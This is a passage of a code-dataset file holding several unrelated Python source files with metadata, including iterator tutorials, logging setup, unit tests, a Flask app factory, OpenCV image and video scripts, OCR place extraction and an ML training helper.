0\n\n    def __next__(self):\n        if self.index == len(self.lst):\n            raise StopIteration\n        city = self.lst[self.index]\n        self.index += 1\n        return self.getCityMsg(city)\n\n    def getCityMsg(self, city):\n        msg = \"the info for %s is....\" % city\n        return msg\n\n\nclass MyIterable(Iterable):\n    def __init__(self, lst):\n        self.iterator = MyIterator(lst)\n\n    def __iter__(self):\n        return self.iterator\n\n\niterable = MyIterable([\"北京\", \"上海\", \"济南\"])\nfor i in iterable:\n    print(i)\n\n\n# implement an iterable with a generator\nclass MyGenerator:\n    def __init__(self, lst):\n        self.lst = lst\n\n    def __iter__(self):\n        for i in self.lst:\n            yield self.getCityMsg(i)\n\n    def getCityMsg(self, city):\n        msg = \"the %s info is....\" % city\n        return 
msg\n\n\nmy_generator = MyGenerator([\"上海\", \"济南\", \"北京\"])\nfor i in my_generator:\n    print(i)\n\n\n# Fibonacci sequence with a generator\n\ndef fib(max):\n    n, a, b = 0, 0, 1\n    while n < max:\n        yield b\n        a, b = b, a + b\n        n += 1\n    return 'done'\n\n\nfor i in fib(10):\n    print(i)\n\nf = fib(6)\nwhile True:\n    try:\n        value = next(f)\n        print(value)\n    except StopIteration as e:\n        print(e.value)\n        break\n", "sub_path": "lines_per_day/january13.py", "file_name": "january13.py", "file_ext": "py", "file_size_in_byte": 2762, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.Iterable", "line_number": 22, "usage_type": "argument"}, {"api_name": "collections.Iterator", "line_number": 79, "usage_type": "name"}, {"api_name": "collections.Iterable", "line_number": 96, "usage_type": "name"}]} +{"seq_id": "455157673", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Custom logging configuration.\"\"\"\n\n# @Time : 9/22/2017 6:42 PM\n# @Author : Xuesong Wu\n# @Site : \n# @File : log_config.py\n# @Software: PyCharm Community Edition\n\nimport logging.config\n\n\ndef log_config():\n    \"\"\"\n    Config log with dict\n    Returns: None\n\n    \"\"\"\n    log_config_dict = {\n        'version': 1,\n        'disable_existing_loggers': False,\n        'formatters': {\n            'simple': {\n                'format': '%(asctime)-15s, %(levelname)s, %(name)s, %(lineno)d, %(process)d, %(message)s',\n                'datefmt': '%a %d %b %Y %H:%M:%S'\n            },\n        },\n        'handlers': {\n            'console': {\n                'class': 'logging.StreamHandler',\n                'level': 'DEBUG',\n                'formatter': 'simple',\n                'stream': 'ext://sys.stdout'\n            },\n            'info_file_handler': {\n                'class': 'logging.FileHandler',\n                'level': 'INFO',\n                'formatter': 'simple',\n                'filename': 'info.log',\n                'encoding': 'utf8',\n                'mode': 'w'\n            }\n        },\n        'loggers': {\n            'root': {\n                'level': 'INFO',\n                'handlers': ['console', 'info_file_handler'],\n                'propagate': False\n            }\n        }\n    }\n    logging.config.dictConfig(log_config_dict)\n    return None\n", "sub_path": "common/log_config.py", "file_name": "log_config.py", "file_ext": "py", "file_size_in_byte": 1422, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.config.config.dictConfig", "line_number": 54, "usage_type": "call"}, {"api_name": "logging.config.config", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.config", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "609850188", "text": "import hashlib\nimport unittest\n\nfrom sailthru.utils import flatten_dictionary, extract_values, make_signature_hash\n\n\nclass UtilsTests(unittest.TestCase):\n\n    def setUp(self):\n        self.secret = 'some totally super secret string'\n        self.test_dict = {\n            'Linux Distros': {\n                'Ubuntu': {\n                    'Quantal Quetzal': '12.10',\n                    'Raring Ringtail': '13.04',\n                    'Saucy Salamander': '13.10',\n                    'Trusty Tahr': '14.04',\n                    'Utopic Unicorn': '14.10',\n                },\n                'Linux Mint': {\n                    'Maya': '13',\n                    'Nadia': '14',\n                    'Olivia': '15',\n                    'Petra': '16',\n                    'Qiana': '17',\n                },\n            },\n            'OS X Versions': {\n                'Yosemite': '10.10',\n                'Mavericks': '10.9',\n                'Mountain Lion': '10.8',\n                'Lion': '10.7',\n                'Snow Leopard': '10.6',\n            }\n        }\n\n    def test_flatten_dictionary(self):\n        expected = {\n            'Linux DistrosUbuntuQuantal Quetzal': '12.10',\n            'Linux DistrosUbuntuRaring Ringtail': '13.04',\n            'Linux DistrosUbuntuSaucy Salamander': '13.10',\n            'Linux DistrosUbuntuTrusty Tahr': '14.04',\n            'Linux DistrosUbuntuUtopic Unicorn': '14.10',\n            'Linux DistrosLinux MintMaya': '13',\n            'Linux DistrosLinux MintNadia': '14',\n            
'Linux DistrosLinux MintOlivia': '15',\n 'Linux DistrosLinux MintPetra': '16',\n 'Linux DistrosLinux MintQiana': '17',\n 'OS X VersionsYosemite': '10.10',\n 'OS X VersionsMavericks': '10.9',\n 'OS X VersionsMountain Lion': '10.8',\n 'OS X VersionsLion': '10.7',\n 'OS X VersionsSnow Leopard': '10.6',\n }\n output = flatten_dictionary(self.test_dict)\n self.assertEqual(expected, output)\n\n def test_extract_values(self):\n expected = sorted([\n '12.10', '13.04', '13.10', '14.04', '14.10', '13', '14', '15', '16', '17', '10.10', '10.9', '10.8',\n '10.7', '10.6'\n ])\n output = sorted(extract_values(self.test_dict))\n self.assertEqual(expected, output)\n\n def test_make_signature_hash(self):\n strings = sorted([\n str(value) for value in extract_values(self.test_dict)\n ])\n string = str(self.secret) + ''.join(strings)\n encoded = bytearray(string, encoding='utf8')\n expected = hashlib.md5(encoded).hexdigest()\n output = make_signature_hash(self.test_dict, self.secret)\n self.assertEqual(expected, output)\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 2771, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sailthru.utils.flatten_dictionary", "line_number": 55, "usage_type": "call"}, {"api_name": "sailthru.utils.extract_values", "line_number": 63, "usage_type": "call"}, {"api_name": "sailthru.utils.extract_values", "line_number": 68, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 72, "usage_type": "call"}, {"api_name": "sailthru.utils.make_signature_hash", "line_number": 73, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "81179397", "text": "from flask import Flask\nfrom app.models import db, User, Product, Thumbnail, Picture, Post, PostPicture, Image\nfrom flask_bcrypt import Bcrypt\nfrom flask_login import LoginManager\n\nbcrypt = Bcrypt()\nlogin_manager = LoginManager()\n\ndef create_app(config_filename='config.py'):\n app = Flask(__name__)\n app.config.from_pyfile(config_filename)\n db.init_app(app)\n bcrypt.init_app(app)\n login_manager.init_app(app)\n with app.app_context():\n db.create_all()\n from app.on_init_utils import on_init_utils\n delete_unused_images, save_images, generate_static_pngs, delete_all_images = on_init_utils(app)\n with app.app_context():\n if app.config['SAVE_IMAGES']:\n delete_unused_images()\n save_images()\n generate_static_pngs()\n else:\n delete_all_images()\n with app.app_context():\n from app.routes import app_routes\n app.register_blueprint(app_routes)\n\n return app\n\n\n", "sub_path": "app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 963, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask_bcrypt.Bcrypt", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 7, "usage_type": "call"}, {"api_name": "app.models", "line_number": 10, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "app.models.config.from_pyfile", "line_number": 11, "usage_type": "call"}, {"api_name": "app.models.config", "line_number": 11, "usage_type": "attribute"}, {"api_name": "app.models", "line_number": 11, "usage_type": "name"}, {"api_name": 
"app.models.db.init_app", "line_number": 12, "usage_type": "call"}, {"api_name": "app.models", "line_number": 12, "usage_type": "argument"}, {"api_name": "app.models.db", "line_number": 12, "usage_type": "name"}, {"api_name": "app.models", "line_number": 13, "usage_type": "argument"}, {"api_name": "app.models", "line_number": 14, "usage_type": "argument"}, {"api_name": "app.models.app_context", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models", "line_number": 15, "usage_type": "name"}, {"api_name": "app.models.db.create_all", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.db", "line_number": 16, "usage_type": "name"}, {"api_name": "app.on_init_utils.on_init_utils", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models", "line_number": 18, "usage_type": "argument"}, {"api_name": "app.models.app_context", "line_number": 19, "usage_type": "call"}, {"api_name": "app.models", "line_number": 19, "usage_type": "name"}, {"api_name": "app.models.config", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.models", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.app_context", "line_number": 26, "usage_type": "call"}, {"api_name": "app.models", "line_number": 26, "usage_type": "name"}, {"api_name": "app.models.register_blueprint", "line_number": 28, "usage_type": "call"}, {"api_name": "app.routes.app_routes", "line_number": 28, "usage_type": "argument"}, {"api_name": "app.models", "line_number": 28, "usage_type": "name"}, {"api_name": "app.models", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "354106822", "text": "import cv2\n\n#画像サイズ デフォルト\nimg_w = 749\nimg_h = 559\n\nprint(\"\"\"\n画像サイズは変更しますか\nYes = 1, No = 0\"\"\")\nCheck_resize = int(input())\n\n\n#動画作成の自作関数\ndef Make_Mov_from_imgs(img_w, img_h):\n fourcc = cv2.VideoWriter_fourcc('m','p','4','v')\n video = cv2.VideoWriter('_US_img_1-1000_{}_{}.mp4'.format(img_w, img_h), fourcc, 20.0, (img_w, img_h))\n\n \n for i in range(1, 1001):\n img = cv2.imread('_US_img_1-1000_749_559/pic_ ({}).png'.format(i))\n\n #変更する場合、リサイズ\n if Check_resize != 0:\n img = cv2.resize(img, (img_w, img_h))\n video.write(img)\n video.release() \n\n\n#サイズ変更しない\nif Check_resize == 0:\n Make_Mov_from_imgs(img_w, img_h)\nelse:#サイズ変更する\n print(\"画像の幅と高さを入力してください\")\n x = input(\"画像の幅  = \")\n y = input(\"画像の高さ = \")\n Make_Mov_from_imgs(int(x), int(y))\n \n", "sub_path": "_1_make_mov_from_imgs.py", "file_name": "_1_make_mov_from_imgs.py", "file_ext": "py", "file_size_in_byte": 969, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "cv2.VideoWriter_fourcc", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "402276308", "text": "from texttable import Texttable\r\ndef pembayaran2():\r\n table= Texttable ()\r\n jawab1 = \"y\"\r\n no=0\r\n name=[]\r\n nim=[]\r\n kelas=[]\r\n membayar_semester=[]\r\n membayar_seminar=[]\r\n membayar_kas=[]\r\n membayar_uts=[]\r\n membayar_uas=[]\r\n admin=[]\r\n \r\n \r\n print (\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\")\r\n print ( \"JALUR PEMBAYARAN UAS & UTS \" )\r\n print (\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\") \r\n \r\n while(jawab1 == \"y\"):\r\n nama=(input(\"Masukan Nama : \"))\r\n 
nim=(input(\"Masukan NIM : \"))\r\n kelas=(input(\"Masukan Kelas: \"))\r\n pilih = (input(\"Apakah anda ingin membayar semester (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_semester =int(input(\"untuk berapa bulan ? \"))\r\n d_membayar_semester = 'membayar_SEMESTER'\r\n membayar_semester=550000*membayar_semester\r\n else :\r\n sem_ = ''\r\n sem=0 \r\n pilih = (input(\"ingin membayar UTS (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_uts =int(input(\"untuk berapa bulan ? \"))\r\n d_membayar_uts = 'membayar_UTS'\r\n membayar_uts=300000*membayar_uts\r\n else :\r\n membayar_uts_ = ''\r\n membayar_uts=0 \r\n pilih = (input(\"ingin membayar UAS (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_uas =int(input(\"untuk berapa bulan ? \"))\r\n d_membayar_uas = 'membayar_UAS'\r\n membayar_uas=200000*membayar_uas\r\n else :\r\n membayar_uas_ = ''\r\n membayar_uas=0 \r\n pilih = (input(\"ingin membayar seminar sebesar 150000 (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_seminar = 'membayar_seminar'\r\n membayar_seminar=150000\r\n else :\r\n membayar_seminar = ''\r\n membayar_seminar=0\r\n pilih = (input(\"ingin bayar KAS Bulanan sebesar 25000 (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_kas = 'membayar_KAS'\r\n membayar_kas=25000\r\n else :\r\n membayar_kas = ''\r\n membayar_kas=0\r\n pilih = (input(\"Anda akan dikenakan admin sebesar 10000 (y/t) ? \"))\r\n if pilih == 'y':\r\n admin = 'ADMIN'\r\n admin=10000\r\n else :\r\n admin = ''\r\n admin=0\r\n\r\n total_bayar = membayar_semester+membayar_seminar+membayar_kas+membayar_uts+membayar_uas+admin\r\n table.add_rows([['NAMA','NIM','KELAS','SEMESTER','SEMINAR','KAS','UTS','UAS','TOTAL'],\r\n [nama ,nim ,kelas ,membayar_semester , membayar_seminar , membayar_kas , membayar_uts , membayar_uas,total_bayar ]])\r\n print(\"\")\r\n print(\"\")\r\n print(\"\")\r\n print(\"Total Rincian Yang Dibayar\") \r\n print (table.draw())\r\n jawab1 = input(\"\\n Tambahkan Data Pembayaran (y/t)? 
\") ; print(\"\")\r\n", "sub_path": "Pembayaran.py", "file_name": "Pembayaran.py", "file_ext": "py", "file_size_in_byte": 2886, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "texttable.Texttable", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "535645953", "text": "import shutil\nimport requests\nimport pandas as pd\nfrom PIL import Image\nimport io\nimport pytesseract\nimport os\nimport json\nimport geopy\nimport geonamescache\nimport unicodedata as ud\nimport string as strMod\nfrom difflib import SequenceMatcher\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\ndef isAllNum(string):\n numb=''\n for el in string:\n if el.isdigit():\n numb+=el\n if len(numb)>0:\n return int(numb)\n else: return string\n\n\n\ndef makeNumeric(element):\n if type(element) == int:\n return element\n if type(element) == list:\n return isAllNum(element[0])\n if type(element) == str:\n return isAllNum(element)\n\n\nlatin_letters= {}\ndef is_latin(uchr):\n try: return latin_letters[uchr]\n except KeyError:\n return latin_letters.setdefault(uchr, 'LATIN' in ud.name(uchr))\n\ndef only_roman_chars(unistr):\n return all(is_latin(uchr)\n for uchr in unistr\n if uchr.isalpha())\ndef notAllUpper(string):\n for el in string:\n if el.isupper():\n pass\n else: return True\n\ndef dealWithPunctuation(text):\n punc = strMod.punctuation\n punc +='’'\n\n string = [el if el not in punc else ' '+el+' ' for el in text]\n return ''.join(string)\n\n# Functions to extract entities from the text\ndef findYearTitle(jsonData):\n metaData = jsonData['metadata']\n title = 'no_title'\n year = 'no_year'\n for el in metaData:\n if el['label'] == 'title':\n title = el['value']\n if el['label'] == 'date_year_start':\n year = el['value']\n\n return title, year\n\ndef getSplitText(urlPage):\n # get text with teseract\n response = requests.get(urlPage, stream=True)\n in_memory_file = io.BytesIO(response.content)\n text = pytesseract.image_to_string(Image.open(in_memory_file))\n text = dealWithPunctuation(text)\n textSplit = text.split()\n # textSplit = [word for word in textSplit if len(word)>2]\n return textSplit\n\ndef getPotCityName(textSplit):\n pot_city_name = []\n for word in textSplit:\n for city in italianCitiesList:\n #if similar(city.lower(), word.lower())>0.9:\n if city.lower() == word.lower():\n pot_city_name.append(city.lower())\n return pot_city_name\n\n# To compile a list of all cities\ndef cityDic():\n city = geonamescache.GeonamesCache().get_cities()\n citiyDic = {}\n cityList = []\n n=0\n for key in city:\n if city[key]['countrycode'] == 'IT' and city[key]['population']> 20000:\n if len(city[key]['alternatenames'][0]) != 0:\n validCityNames = [city[key]['name'].lower()] + [name.lower() for name in city[key]['alternatenames'] if only_roman_chars(name) and notAllUpper(name) and len(name)>3]\n cityList += validCityNames\n for name in validCityNames:\n citiyDic[name] = city[key]\n\n else:\n cityList+=[city[key]['name'].lower()]\n citiyDic[city[key]['name'].lower()] = city[key]\n\n n+=1\n\n cityFilter = ['regio', 'marino', 'come', 'bra', 'ramma']\n cityList = list(filter(lambda a: a not in cityFilter, cityList))\n cityList = list(set(cityList))\n print(len(cityList))\n return citiyDic, cityList\n\n\n\n#change path according to need\ninPath = '/home/nulpe/Desktop/foundations_dh/fdh_manifests/'\noutPath = '/home/nulpe/Desktop/foundations_dh/data/'\ncolumns =['file_name', 'title', 'date', 'coperta', 'pot_city_name', 'city_name', 
'latitude', 'longitude']\ndf_librettos = pd.DataFrame(columns= columns)\n\n\nitalianCities, italianCitiesList = cityDic()\n\n\n\n\n\npotCityMatches = 0\n\nfor idx, filename in enumerate(os.listdir(inPath)):\n tempList = []\n\n if filename.endswith(\".json\"):\n tempList.append(filename)\n with open(inPath+filename) as jsonFile:\n jsonData = json.load(jsonFile)\n title, year = findYearTitle(jsonData)\n tempList.append(title)\n tempList.append(makeNumeric(year))\n front_page = []\n pot_city_name = []\n\n pagesData = jsonData['sequences'][0]['canvases']\n page = 0\n\n\n #Only look at the coperte\n i=0\n coperta = True\n\n\n #get text from coperte\n while coperta:\n try:\n el = pagesData[i]\n i += 1\n\n imageApi = el['images'][0]['resource']['service']['@id']\n urlPage = imageApi+'/full/,512/0/default.jpg'\n\n #get text with teseract & potential city name\n textSplit = getSplitText(urlPage)\n front_page += textSplit\n pot_city_name = getPotCityName(textSplit)\n coperta_appended = 0\n\n if 'coperta' not in pagesData[i]['label']:\n coperta = False\n except:\n print('page missing')\n break\n\n\n\n if len(front_page) <30:\n while len(front_page) < 100:\n try:\n el = pagesData[i]\n i += 1\n imageApi = el['images'][0]['resource']['service']['@id']\n urlPage = imageApi + '/full/,512/0/default.jpg'\n\n # get text with teseract\n textSplit = getSplitText(urlPage)\n front_page += textSplit\n pot_city_name += getPotCityName(textSplit)\n coperta_appended = 1\n except:\n print('page missing')\n break\n\n\n\n\n\n\n tempList.append(front_page)\n tempList.append(pot_city_name)\n \n\n #Get location of first mentioned city\n if len(pot_city_name) != 0:\n tempList.append(italianCities[pot_city_name[0]]['name'])\n tempList.append(italianCities[pot_city_name[0]]['latitude'])\n tempList.append(italianCities[pot_city_name[0]]['longitude'])\n else:\n tempList.append(0)\n tempList.append(0)\n tempList.append(0)\n\n if len(pot_city_name) != 0:\n potCityMatches+=1\n\n\n df_librettos.loc[len(df_librettos)] =tempList\n\n print('we are at ', idx + 1, 'of in total', len(os.listdir(inPath)), 'librettos. 
We have', potCityMatches/(idx + 1)*100, '% city matches')\n\n    if (idx+1) % 10 == 0:\n        print(df_librettos)\n        df_librettos.columns = columns\n        df_librettos.to_pickle(outPath+'librettos_1.pkl')\n        df_librettos.to_csv(outPath+'librettos_1.csv', index=False, sep='\\t', header=True)\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "02_place_extraction.py", "file_name": "02_place_extraction.py", "file_ext": "py", "file_size_in_byte": 6841, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "difflib.SequenceMatcher", "line_number": 16, "usage_type": "call"}, {"api_name": "unicodedata.name", "line_number": 42, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 55, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 76, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 77, "usage_type": "call"}, {"api_name": "pytesseract.image_to_string", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 78, "usage_type": "name"}, {"api_name": "geonamescache.GeonamesCache", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 125, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 136, "usage_type": "call"}, {"api_name": "json.load", "line_number": 142, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "215432780", "text": "import time\nfrom sklearn.cross_validation import train_test_split\n\nfrom ..utils import print_status_message, fit_transforms, apply_transforms, predict_score\n\n\ndef train_model(X, y, model, library, metric, transforms, eval=False, plot_eval_history=False,\n                early_stopping=False, early_stopping_rounds=None, verbose=False, logger=None):\n    \"\"\"\n    Trains a new model using the provided training data.\n\n    Parameters\n    ----------\n    X : array-like\n        Training input samples.\n\n    y : array-like\n        Target values.\n\n    model : object\n        An object in memory that represents a model definition.\n\n    library : {'sklearn', 'xgboost', 'keras'}\n        The source library of the model. Supports more than just scikit-learn models, however\n        since model APIs can vary there may be different features/capabilities available depending\n        on which library is used.\n\n    metric : {'accuracy', 'f1', 'log_loss', 'mean_absolute_error', 'mean_squared_error', 'r2', 'roc_auc'}\n        Scoring metric.\n\n    transforms : array-like\n        List of objects with a transform function that accepts one parameter.\n\n    eval : boolean, optional, default False\n        Evaluate model on a hold-out set during training.\n\n    plot_eval_history : boolean, optional, default False\n        Plot model performance as a function of training time. Eval must be enabled.\n\n    early_stopping : boolean, optional, default False\n        Stop training the model when performance on a validation set begins to drop. 
Eval must be enabled.\n\n early_stopping_rounds : int, optional, default None\n Number of training iterations to allow before stopping training due to performance on a validation set.\n Eval and early_stopping must be enabled.\n\n verbose : boolean, optional, default False\n Prints status messages to the console if enabled.\n\n logger : object, optional, default None\n Instance of a class that can log messages to an output file.\n\n Returns\n ----------\n model : object\n An object in memory that represents a fitted model.\n\n training_history : array-like\n Model performance on a validation set after each training epoch. Only available for certain models.\n \"\"\"\n print_status_message('Beginning model training...', verbose, logger)\n t0 = time.time()\n X_train = None\n X_eval = None\n y_train = None\n y_eval = None\n training_history = None\n\n if eval:\n X_train, X_eval, y_train, y_eval = train_test_split(X, y, test_size=0.1)\n transforms = fit_transforms(X_train, y_train, transforms)\n X_train = apply_transforms(X_train, transforms)\n X_eval = apply_transforms(X_eval, transforms)\n\n if early_stopping:\n if library == 'xgboost':\n model.fit(X_train, y_train, eval_set=[(X_eval, y_eval)], eval_metric='rmse',\n early_stopping_rounds=early_stopping_rounds)\n training_history = model.eval_results\n print_status_message('Best iteration found = {0}'.format(str(model.best_iteration)), verbose, logger)\n else:\n raise Exception('Early stopping not supported.')\n else:\n if library == 'xgboost':\n model.fit(X_train, y_train, eval_set=[(X_eval, y_eval)], eval_metric='rmse')\n training_history = model.eval_results\n print('TODO')\n elif library == 'keras':\n model.validation_data = (X_eval, y_eval)\n training_history = model.fit(X_train, y_train)\n min_eval_loss = min(training_history.history['val_loss'])\n min_eval_epoch = min(enumerate(training_history.history['loss']), key=lambda x: x[1])[0] + 1\n print_status_message('Min eval loss = {0}'.format(str(min_eval_loss)), verbose, logger)\n print_status_message('Min eval epoch = {0}'.format(str(min_eval_epoch)), verbose, logger)\n else:\n raise Exception('Model evaluation not supported.')\n else:\n transforms = fit_transforms(X, y, transforms)\n X = apply_transforms(X, transforms)\n if library == 'keras':\n training_history = model.fit(X, y)\n else:\n model.fit(X, y)\n\n t1 = time.time()\n print_status_message('Model trained in {0:3f} s.'.format(t1 - t0), verbose, logger)\n\n print_status_message('Model hyper-parameters:', verbose, logger)\n print_status_message(str(model.get_params()), verbose, logger)\n\n if eval:\n print_status_message('Calculating training score...', verbose, logger)\n train_score = predict_score(X_train, y_train, model, metric)\n print_status_message('Training score = {0}'.format(str(train_score)), verbose, logger)\n\n print_status_message('Calculating evaluation score...', verbose, logger)\n eval_score = predict_score(X_eval, y_eval, model, metric)\n print_status_message('Evaluation score = {0}'.format(str(eval_score)), verbose, logger)\n\n if plot_eval_history:\n if library == 'xgboost':\n print('TODO')\n elif library == 'keras':\n print('TODO')\n else:\n raise Exception('Eval history not supported.')\n else:\n print_status_message('Calculating training score...', verbose, logger)\n train_score = predict_score(X, y, model, metric)\n print_status_message('Training score = {0}'.format(str(train_score)), verbose, logger)\n\n return model, training_history\n", "sub_path": "ionyx/experiment/model.py", "file_name": "model.py", 
"file_ext": "py", "file_size_in_byte": 5555, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "utils.print_status_message", "line_number": 61, "usage_type": "call"}, {"api_name": "time.time", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.fit_transforms", "line_number": 71, "usage_type": "call"}, {"api_name": "utils.apply_transforms", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.apply_transforms", "line_number": 73, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 80, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 93, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.fit_transforms", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.apply_transforms", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 106, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 108, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 109, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.predict_score", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 114, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 116, "usage_type": "call"}, {"api_name": "utils.predict_score", "line_number": 117, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 118, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 128, "usage_type": "call"}, {"api_name": "utils.predict_score", "line_number": 129, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "121537457", "text": "\"\"\"\nPatrick Stadler (pstadler1990)\nUniversität Regensburg\nSS 19\n\"\"\"\nimport io\nimport os\nimport csv\nimport json\n\nYEAR = \"2018\"\nOUT_DIR = os.path.join(\"converted_data\", YEAR)\nKEYWORD_EN_FILE = os.path.join(OUT_DIR, \"DHD_Keywords.csv\")\nOUT_FILE = os.path.join(OUT_DIR, \"keywords_en_split.json\")\n\n\ndef apply_keyword(keyword):\n return clear_keyword(keyword) # split_keyword removed due to wikipedia search being more polite to larger keywords\n\n\ndef split_keyword(keyword):\n \"\"\"\n Splits the keyword into multiple keyboards (if separated by a whitespace)\n Creates a set of:\n - every single keyword in a list of keywords (i.e. 
3d digital art) => 3d, digital, art\n    - every pair of two keywords from the left => 3d digital\n    - every pair of two keywords from the right => digital art\n    This increases the chances of matching with the category list (tags)\n    \"\"\"\n    entries = []\n    entries_all = keyword[1].split(' ')\n    entries_split_length = len(entries_all)\n    if entries_split_length <= 1:\n        entries = entries_all\n    else:\n        for i in range(entries_split_length):\n            entries += keyword[1].split(' ', maxsplit=1)\n        for i in range(entries_split_length):\n            entries += keyword[1].rsplit(' ', maxsplit=1)\n        entries = list(set(entries) | set(entries_all))\n    return {'original': keyword[0], 'en': keyword[1], 'entries': entries}\n\n\ndef clear_keyword(keyword):\n    return [k.strip().lower() for k in keyword]\n\n\ndef parse_keywords(keyword_file, out_file):\n    \"\"\"\n    Splits each keyword into an object (each word - separated by a whitespace - becomes an entry\n    in the object's entry list\n    \"\"\"\n    with io.open(keyword_file, newline='') as file:\n        keywords = csv.reader(file, delimiter=',')\n        keyword_list = ([apply_keyword(keyword) for keyword in keywords])\n    with io.open(out_file, \"w\", encoding=\"utf8\") as out_file:\n        json.dump(keyword_list, out_file, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n    parse_keywords(KEYWORD_EN_FILE, out_file=OUT_FILE)\n", "sub_path": "KeywordCleaner.py", "file_name": "KeywordCleaner.py", "file_ext": "py", "file_size_in_byte": 2075, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "io.open", "line_number": 53, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 54, "usage_type": "call"}, {"api_name": "io.open", "line_number": 56, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "382144810", "text": "import numpy as np\nimport cv2\n\nimg = cv2.imread('../../Picture/water.jpg', 1)\nimgInfo = img.shape\nprint(\"img.shape:\", imgInfo)  # print the image's [width, height, color channel mode]\ncv2.imshow(\"img\", img)\nheight = imgInfo[0]\nwidth = imgInfo[1]\nmode = imgInfo[2]\n\n# image rotation with getRotationMatrix2D()\n# the first parameter is the image's center point\n# the second parameter is the rotation angle in degrees\n# the third parameter is the scale factor, 1 at most\nfor i in range(0, 360, 1):\n    matRotate = cv2.getRotationMatrix2D((width / 2.0, height / 2.0), i, i / 360)\n    dst = cv2.warpAffine(img, matRotate, (width, height))\n    cv2.imshow(\"dst\", dst)\n    